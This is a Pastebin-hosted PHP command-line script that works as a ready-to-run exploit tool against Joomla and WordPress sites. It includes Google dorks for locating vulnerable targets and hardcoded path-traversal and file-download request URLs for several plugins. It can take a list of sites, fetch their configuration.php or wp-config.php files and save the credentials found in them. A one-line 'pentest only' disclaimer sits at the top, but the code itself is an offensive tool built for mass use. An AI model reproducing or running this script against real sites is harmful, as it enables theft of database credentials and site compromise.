diabliyo

wj_exploit.php

Oct 4th, 2018
652
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.86 KB | None | 0 0
  1. #!/usr/bin/php
  2. <?php
  3. /*
  4. Autor: Angel Cantu
  5.  
  6. DISCLAIMER
  7. This script only is for pentest using, don't use this code for alterate o attack websites
  8.  
  9. DORKS
  10. inurl:'index.php?option=com_joomanager
  11. inurl:option=com_cckjseblod
  12. inurl:/wp-content/plugins/revslider/
  13. revslider.php 'index of
  14. inurl:force-download.php?file=wp-content/uploads
  15. inurl:wp-content/uploads inurl:force-download.php?file=
  16. */
  17.  
  18. function fileOrUrl($a)
  19. {
  20. $r=0;
  21. $path= getcwd()."/"; # current path
  22. if( file_exists($path.$a) ) $r=1; # file with urls
  23. else
  24. {
  25. $out= parse_url($a);
  26. $r= ( ($out["scheme"] && $out["host"]) ? 2:0);
  27. unset($out);
  28. }
  29. unset($path);
  30.  
  31. return $r;
  32. }
  33.  
  34. function geturlname($a)
  35. {
  36. $patron= '/http(s)?\:\/\/([a-zA-Z0-9.\-]{1,})/';
  37. preg_match_all($patron, $a, $buf);
  38. unset($patron);
  39. return $buf[2][0];
  40. }
  41.  
  42. function getUrl($a)
  43. {
  44. $patron= '/http(s)?\:\/\/([a-zA-Z0-9.\-]{1,})/';
  45. preg_match_all($patron, $a, $buf);
  46. unset($patron);
  47. return 'http'.($buf[1][0] ? 's':'').'://'.$buf[2][0];
  48. }
  49.  
  50. function attackLibrary( $a )
  51. {
  52. $joomla= array(
  53. "name"=>"Joomla",
  54. "0"=>array(
  55. "name"=>"joom_manager",
  56. "exploit"=>"/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php"
  57. ),
  58. "1"=>array(
  59. "name"=>"joom_download",
  60. "exploit"=>"/index.php?option=com_cckjseblod&task=download&file=configuration.php"
  61. )
  62. );
  63. $wp= array(
  64. "name"=>"Wordpress",
  65. "0"=>array(
  66. "name"=>"wp_revslider",
  67. "exploit"=>"/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"
  68. ),
  69. "1"=>array(
  70. "name"=>"wp_forcedownload",
  71. "exploit"=>"/force-download.php?file=wp-config.php"
  72. )
  73. );
  74. return (!strcmp($a, "w") ? $wp:$joomla);
  75. }
  76.  
  77. function attackSend($mode, $target)
  78. {
  79. $path= getcwd()."/";
  80. $a= attackLibrary($mode);
  81. echo "\n** ". $a["name"]. " Attacking..\n";
  82.  
  83. foreach( $a as $key=>$val )
  84. {
  85. if( strcmp($key, "name") )
  86. {
  87. echo "\n[". $val["name"]. "] Starting attack \"". $val["name"]. "\"..";
  88. # $cmd= "/usr/bin/curl \"".$target.$val["exploit"]."\" -O ".$path.$target."_".$key.".log";
  89. # system($cmd); # explot
  90.  
  91. $buf= @file_get_contents($target.$val["exploit"]);
  92. $fp= fopen($path.geturlname($target)."_".$key.".log", "w");
  93. fwrite($fp, $buf);
  94. fclose($fp);
  95.  
  96. if( !filesize($path.geturlname($target).'_'.$key.'.log') )
  97. echo "\n[ERROR] The config is protected..";
  98. else
  99. echo "\n[DONE] The configuration is Hacked xD";
  100. unset($cmd, $fp, $buf);
  101. }
  102. }
  103. return;
  104. }
  105.  
  106. function cleanjump( $data )
  107. {
  108. return substr($data, 0, -1);
  109. }
  110.  
  111. if( $argc!=4 )
  112. echo "\n[ERROR] Need argument, try: -a w URL";
  113. else
  114. {
  115. if( !($op=fileOrUrl($argv[3])) )
  116. echo "\n[ERROR] The argument isn't a file neither URL..";
  117. else
  118. {
  119. echo "\n[Done] You provide a ". ($op==1 ? "File with URLs":"URL Web");
  120.  
  121. if( strcmp($argv[1], "-a") ) # not set attack type
  122. echo "\n[ERROR] You don't set attack type, use: \"-a w\" (wordpress) or \"-a j\" (joomla)";
  123. else if( strcmp($argv[2], "w") && strcmp($argv[2], "j") )
  124. echo "\n[ERROR] This script only use ttacks with: \"w\" (wordpress) or \"j\" (joomla)";
  125. else # done
  126. {
  127. if( $op==2 ) # url
  128. {
  129. $target= geturl($argv[3]); # cleaning
  130. $path= getcwd(). "/";
  131. echo "\n[URL] Target detected: ". $target;
  132. echo "\n[Path] Working on: ". $path;
  133. echo "\n\n";
  134. attackSend($argv[2], $target);
  135. }
  136. else # file
  137. {
  138. $fp= fopen($path.$argv[3], "r");
  139. $urls= array();
  140. while( ($buf=fgets($fp, (5*1024)))!==FALSE )
  141. $urls[]= cleanjump($buf);
  142.  
  143. echo "\n[FILE] Detected: ". count($urls). " targets..";
  144. echo "\n[LIST] Targets List:\n";
  145.  
  146. foreach( $urls as $key=>$val ) echo "\n". $val;
  147. foreach( $urls as $key=>$val ) attackSend($argv[2], $val);
  148. unset($urls);
  149. }
  150. }
  151. }
  152. }
  153.  
  154. echo "\n\n";
  155. exit;
  156. ?>
Advertisement
Add Comment
Please, Sign In to add comment